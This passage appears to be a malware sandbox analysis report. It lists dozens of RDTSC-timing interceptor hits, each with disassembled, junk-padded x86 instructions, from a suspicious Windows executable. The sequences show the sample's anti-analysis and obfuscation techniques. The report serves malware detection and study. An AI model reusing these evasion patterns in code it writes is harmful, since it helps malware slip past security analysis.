0x00000050 popfd 0x00000051 pop eax 0x00000052 popad 0x00000053 mov eax, dword ptr [ebx+5Ch] 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FD13D06371Dh 0x0000005d add ecx, 487F1C86h 0x00000063 jmp 00007FD13D063721h 0x00000068 popfd 0x00000069 mov edx, ecx 0x0000006b popad 0x0000006c mov dword ptr [esi+20h], eax 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 movzx esi, di 0x00000075 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140615 second address: 7140645 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD13CB4AEFBh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx edi, ax 0x0000000d popad 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD13CB4AF07h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140645 second address: 7140674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD13D06371Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140674 second address: 71406D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AF07h 0x00000009 add cl, FFFFFFDEh 0x0000000c jmp 00007FD13CB4AF09h 0x00000011 popfd 0x00000012 call 00007FD13CB4AF00h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [ebx+64h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD13CB4AEFCh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71406D1 second address: 71406F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 13D667B4h 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+28h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD13D063722h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71406F5 second address: 714070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bl, ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714070C second address: 7140724 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 3DD4B0AEh 0x0000000b popad 0x0000000c mov dword ptr [esi+2Ch], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 mov bh, A1h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140724 second address: 7140762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 7E36h 0x00000007 mov bx, 47C2h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [ebx+6Ch] 0x00000012 jmp 00007FD13CB4AF09h 0x00000017 mov word ptr [esi+30h], ax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD13CB4AEFDh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140762 second address: 71407C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 pushad 0x00000011 mov cl, 11h 0x00000013 pushfd 0x00000014 jmp 00007FD13D063729h 0x00000019 and cx, 8256h 0x0000001e jmp 00007FD13D063721h 0x00000023 popfd 0x00000024 popad 0x00000025 mov word ptr [esi+32h], ax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD13D06371Dh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71408AB second address: 71408B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71408B1 second address: 71408B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71408B5 second address: 7140972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b jmp 00007FD13CB4AEFBh 0x00000010 lea eax, dword ptr [ebx+00000080h] 0x00000016 jmp 00007FD13CB4AF06h 0x0000001b push 00000001h 0x0000001d jmp 00007FD13CB4AF00h 0x00000022 nop 0x00000023 pushad 0x00000024 jmp 00007FD13CB4AEFEh 0x00000029 movzx ecx, di 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FD13CB4AEFAh 0x00000035 add al, FFFFFFD8h 0x00000038 jmp 00007FD13CB4AEFBh 0x0000003d popfd 0x0000003e mov si, B88Fh 0x00000042 popad 0x00000043 nop 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 jmp 00007FD13CB4AF07h 0x0000004c pushfd 0x0000004d jmp 00007FD13CB4AF08h 0x00000052 and ch, FFFFFF98h 0x00000055 jmp 00007FD13CB4AEFBh 0x0000005a popfd 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140972 second address: 7140978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140978 second address: 71409C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007FD13CB4AF07h 0x00000010 nop 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FD13CB4AF02h 0x0000001a and cx, 8358h 0x0000001f jmp 00007FD13CB4AEFBh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71409C2 second address: 7140A35 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, AE2Bh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov di, BAD2h 0x00000011 mov ch, bl 0x00000013 popad 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FD13D063727h 0x0000001e xor eax, 6481977Eh 0x00000024 jmp 00007FD13D063729h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FD13D063720h 0x00000030 adc si, B278h 0x00000035 jmp 00007FD13D06371Bh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140ABC second address: 7140AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AF01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140AD1 second address: 7140AF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140AF1 second address: 7140B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B04 second address: 7140B19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ED2Ah 0x00000007 mov dh, B1h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B19 second address: 7140B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B1D second address: 7140B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B21 second address: 7140B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B27 second address: 7140B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c jmp 00007FD13D063720h 0x00000011 push 00000001h 0x00000013 jmp 00007FD13D063720h 0x00000018 nop 0x00000019 jmp 00007FD13D063720h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD13D06371Eh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140B80 second address: 7140BB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AEFCh 0x00000009 and si, 6F08h 0x0000000e jmp 00007FD13CB4AEFBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FD13CB4AEFEh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140BB7 second address: 7140C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c pushad 0x0000000d call 00007FD13D063724h 0x00000012 pushfd 0x00000013 jmp 00007FD13D063722h 0x00000018 sbb ecx, 577F4EF8h 0x0000001e jmp 00007FD13D06371Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 mov esi, edx 0x00000027 popad 0x00000028 push ebx 0x00000029 jmp 00007FD13D063720h 0x0000002e mov dword ptr [esp], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov dl, 4Bh 0x00000036 mov dx, ax 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CBA second address: 7140CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AEFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CCA second address: 7140CF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d mov eax, edi 0x0000000f popad 0x00000010 js 00007FD1AAD220F5h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD13D06371Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CF0 second address: 7140CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CF6 second address: 7140CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CFA second address: 7140CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140CFE second address: 7140D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FD13D063722h 0x00000013 call 00007FD13D063722h 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140D32 second address: 7140D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AF07h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140D4D second address: 7140DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e jmp 00007FD13D06371Eh 0x00000013 lea eax, dword ptr [ebx+70h] 0x00000016 pushad 0x00000017 mov eax, 220AB0CDh 0x0000001c pushfd 0x0000001d jmp 00007FD13D06371Ah 0x00000022 or esi, 27084DE8h 0x00000028 jmp 00007FD13D06371Bh 0x0000002d popfd 0x0000002e popad 0x0000002f push 00000001h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push edx 0x00000035 pop esi 0x00000036 call 00007FD13D063727h 0x0000003b pop eax 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DC4 second address: 7140DF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov cx, 18FDh 0x0000000f mov ecx, 09FE47F9h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bx, cx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DF3 second address: 7140DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DF8 second address: 7140DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140DFE second address: 7140E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140E02 second address: 7140E4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov cx, dx 0x0000000d mov si, bx 0x00000010 popad 0x00000011 lea eax, dword ptr [ebp-18h] 0x00000014 jmp 00007FD13CB4AF05h 0x00000019 nop 0x0000001a jmp 00007FD13CB4AEFEh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD13CB4AEFEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140E4B second address: 7140E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140E50 second address: 7140E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 6C359812h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edi, si 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EB2 second address: 7140EB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EB8 second address: 7140EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FD13CB4AEFFh 0x0000000f test edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD13CB4AF00h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EE7 second address: 7140EF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140EF6 second address: 7140F8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FD1AA809692h 0x0000000f pushad 0x00000010 push eax 0x00000011 mov edx, 72859E3Eh 0x00000016 pop edi 0x00000017 mov dx, si 0x0000001a popad 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e pushad 0x0000001f push ecx 0x00000020 mov bx, 12EEh 0x00000024 pop edi 0x00000025 movzx esi, bx 0x00000028 popad 0x00000029 mov ecx, esi 0x0000002b jmp 00007FD13CB4AF07h 0x00000030 mov dword ptr [esi+0Ch], eax 0x00000033 pushad 0x00000034 mov eax, 09FFB98Bh 0x00000039 jmp 00007FD13CB4AF00h 0x0000003e popad 0x0000003f mov edx, 74E806ECh 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushfd 0x00000048 jmp 00007FD13CB4AEFCh 0x0000004d sbb eax, 24DD5CC8h 0x00000053 jmp 00007FD13CB4AEFBh 0x00000058 popfd 0x00000059 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140F8D second address: 7140FD0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD13D063728h 0x00000008 adc si, DF28h 0x0000000d jmp 00007FD13D06371Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 sub eax, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD13D06371Eh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140FD0 second address: 7141000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d jmp 00007FD13CB4AF06h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141000 second address: 7141004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141004 second address: 7141008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141008 second address: 714100E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714100E second address: 7141014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141014 second address: 7141078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov di, si 0x0000000e call 00007FD13D063724h 0x00000013 pushfd 0x00000014 jmp 00007FD13D063722h 0x00000019 and cl, FFFFFFA8h 0x0000001c jmp 00007FD13D06371Bh 0x00000021 popfd 0x00000022 pop esi 0x00000023 popad 0x00000024 jne 00007FD1AAD21D98h 0x0000002a pushad 0x0000002b call 00007FD13D063725h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141078 second address: 71410E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FD13CB4AF07h 0x0000000b sub si, CB4Eh 0x00000010 jmp 00007FD13CB4AF09h 0x00000015 popfd 0x00000016 popad 0x00000017 mov edx, dword ptr [ebp+08h] 0x0000001a jmp 00007FD13CB4AEFEh 0x0000001f mov eax, dword ptr [esi] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD13CB4AF07h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71410E1 second address: 71410E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71410E7 second address: 71410EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71410EB second address: 71410EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150CA6 second address: 7150CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a movzx esi, dx 0x0000000d push edi 0x0000000e pushfd 0x0000000f jmp 00007FD13CB4AF04h 0x00000014 jmp 00007FD13CB4AF05h 0x00000019 popfd 0x0000001a pop eax 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150CE8 second address: 7150D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150D01 second address: 7150D1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150D1F second address: 7150D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150D23 second address: 7150D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150DFA second address: 7150E0D instructions: 0x00000000 rdtsc 0x00000002 call 00007FD13D06371Ah 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov bh, 77h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150ABF second address: 7150B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FD13CB4AF04h 0x0000000b sub esi, 01FE2638h 0x00000011 jmp 00007FD13CB4AEFBh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FD13CB4AEFBh 0x00000022 and al, FFFFFFFEh 0x00000025 jmp 00007FD13CB4AF09h 0x0000002a popfd 0x0000002b call 00007FD13CB4AF00h 0x00000030 pop esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B2B second address: 7150B77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063720h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, C5C3h 0x00000011 pushfd 0x00000012 jmp 00007FD13D063728h 0x00000017 jmp 00007FD13D063725h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B77 second address: 7150B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B89 second address: 7150B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B8D second address: 7150B93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B93 second address: 7150B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B99 second address: 7150B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B9D second address: 7150BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD13D063723h 0x00000011 rdtsc
